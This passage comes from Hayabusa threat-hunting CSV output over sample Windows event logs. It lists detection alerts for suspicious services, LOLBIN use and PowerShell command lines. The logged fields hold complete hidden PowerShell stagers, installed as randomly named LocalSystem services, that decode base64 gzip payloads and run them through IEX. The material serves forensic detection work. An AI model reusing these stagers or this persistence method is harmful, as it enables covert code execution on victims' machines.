| PID: 0xbf4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.834 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:48.834 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.017 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.017 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.106 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.106 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.183 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.183 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.891 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 17:43:49.912 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 18:12:12.619 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 19:12:55.622 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:04:48.639 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.147 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:36:09.147 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object 
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:36:09.147 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:36:09.237 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c 
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.237 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.237 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.237 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String('H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.034 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:38:04.034 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:38:04.034 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:38:04.041 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.041 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.041 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.041 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz 
Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkv
Vb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.087 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.643 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:59:41.659 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 
